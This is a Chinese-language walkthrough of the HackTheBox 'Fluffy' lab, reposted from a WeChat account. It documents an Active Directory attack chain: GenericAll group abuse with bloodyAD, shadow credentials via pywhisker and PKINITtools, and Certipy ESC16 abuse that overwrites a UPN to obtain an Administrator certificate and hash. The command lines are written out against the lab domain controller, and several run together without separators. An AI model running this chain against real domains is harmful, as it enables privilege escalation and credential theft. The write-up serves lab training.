HTB_Fluffy
Windows(Easy)
总结
user.txt
smb_shares,pdf->CVE-2025-24071->shadow-credentials(GenericAll+GenericWrite)
GenericAll(on Group):添加用户进组
python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx'set owner 'xxx''p.agila';python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx' add groupMember 'pxx''p.agila';
GenericWrite:Shadow Credentials
python ~/htb/tools/pywhisker/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'pxx' --target "winrm_svc" --action "add"python ~/htb/tools/PKINITtools/gettgtpkinit.py 'fluffy.htb/winrm_svc' -cert-pfx 'IW?.pfx' -pfx-pass 'L4???' winrm_svc.ccacheexport KRB5CCNAME=`pwd`/winrm_svc.ccache;python ~/htb/tools/PKINITtools/getnthash.py -key xxxxx fluffy.htb/winrm_svc
winrm_svc用bloodhound时,hashes会报错,所以用krb,形如:
sudo ntpdate fluffy.htb;sudo impacket-getTGT 'fluffy.htb/p.agila:pxx' -dc-ip 10.10.11.69;export KRB5CCNAME=`pwd`/p.agila.ccache;
root
通过winrm_svc进行bloodhound,知道可以对Administrator进行GenericAll,但是强改密码失败;但是也提供了ca_svc的用户,同样的权限,因为名字的缘故,引导转向ca相关路线,工具:certipy
certipy find -vulnerable -u [email protected] -hashes xxx -dc-ip 10.10.11.69
certipy需要5.0.2版本,我原有的4.8.2搜不到vul,即ESC16
] Got error while requesting certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA.Woul
-template 值不是ESC16,而是基于User
但是这样的话,得到的还是ca_svc.pfx
需要先修改ca_svc的upn为administrator,通过之前进组的p.agila设置
certipy account -u '[email protected]' -p 'pxx' -dc-ip 10.10.11.69 -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update[-] Received error: 000021C8: AtrErr: DSID-03200E96, #1: 0: 000021C8: DSID-03200E96, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 90290 (userPrincipalName)
当时这个没解决,没做了,之后又可以了。。。
certipy那块主要是发现ESC16,然后呢覆盖当前用户的upn为administrator
主要是
certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -user 'ca_svc'readCertipy v5.0.2 - by Oliver Lyak (ly4k)[*] Reading attributes for'ca_svc':... userPrincipalName : administrator
否则certipy req请求的还是当前用户的pfx,没用
#覆盖upncertipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update #请求pfxcertipy req -u [email protected] -hashes xx -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'#当前upn变回原来的certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update #获取hashsudo ntpdate fluffy.htb;certipy auth -u administrator -domain fluffy.htb -pfx 'administrator.pfx' -dc-ip '10.10.11.69'
参考
wp:
https://4xura.com/ctf/htb/htb-writeup-fluffy/
其它
https://github.com/0x6rss/CVE-2025-24071_PoC
https://github.com/ly4k/Certipy.git
certipy只有v5.0.0及以上才支持ESC1-ESC16的
This will fetch and install the latest release. It's a good idea to periodically update, as new releases may add support for newly discovered vulnerabilities (e.g., ESC9+ techniques) or improved features. At the time of writing, Certipy v5.0.0 is the latest version (which supports ESC1 - ESC16).
或者 pip install -U certipy-ad
升级即可
升级后就用certypy
代替了,如果加ad还是原版本
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
原文始发于微信公众号(羽泪云小栈):Se8_Fluffy(思路)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论